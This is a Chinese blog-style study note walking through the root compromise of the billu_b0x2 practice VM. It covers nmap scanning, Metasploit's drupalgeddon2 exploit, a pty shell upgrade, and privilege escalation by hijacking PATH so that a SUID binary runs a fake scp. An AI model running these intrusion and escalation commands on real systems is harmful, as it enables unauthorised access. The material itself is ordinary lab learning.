渗透靶机测试--billu_b0x2--学习笔记

最近找了几个渗透靶机来玩玩,主要目的是为了获取root权限。这次的靶机名字是billu_b0x2,下载地址

攻击机ip:192.168.6.128

靶机   ip:192.168.6.132

 

 

1.打开目标靶机,正常用nmap扫描一下目标靶机的ip,

         使用命令 nmap -sP 192.168.6.0/24

         可以找到目标靶机的ip地址为192.168.6.132

2.寻找靶机开放端口

        使用命令 nmap -p- -A -T4 192.168.6.132

         

         可以看到靶机开放了80,111,8080和22端口

3.那么我就正常的访问一下http服务,也就是80端口和8080端口

   同时也非常幸运,在80端口可以看到其使用了drupal模板

   

4.既然知道了是drupal模板,就可以使用msfconsole中的drupal模块进行渗透

   打开msfconsole控制台,搜索drupal

    命令为:msfconsole       

                   msf>search drupal

5.然后找到最新的一个drupal漏洞,利用它

   命令为 use exploit/unix/webapp/drupal_drupalgeddon2

    然后设置rhost为靶机ip

   执行命令 run

   然后执行shell

6.我们可以在这边输入一个反弹shell

  命令为  python -c "import pty;pty.spawn('/bin/bash')"

  可以获取像linux那样的shell

7.我们的目的是为了获取root权限,所以先去找找带有root权限的文件

   使用命令  find / -perm -u=s 2>/dev/null

    发现了一个比较不一样的带有root权限的东西  /opt/s

   

8.然后测试一下 strings /opt/s 

   发现其可以执行scp命令 并且为root权限

    

9.那么可以想到可以利用它来添加scp到环境变量,并且执行提权脚本

   使用命令添加提权脚本到scp下,然后添加到环境变量中去

   echo -nc "/bin/bash" >/tmp/scp

10.然后赋予这个文件权限

    命令 chmod +x /tmp/scp

    然后导入环境变量中去

   命令 export PATH=/tmp:$PATH

11.可以看到环境变量已经被导入了

然后就可以切换到opt目录下,执行文件

然后可以成功的获得到root权限了

12.至此就全部结束了,下面是一些补充的学习内容

① echo命令

     echo 命令可以输出字符串(想当于php的echo吧)

     然后使用 > xxx/xxx 可以指定输入到某个文件中去,这样可以执行创建文件并赋值的功能

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值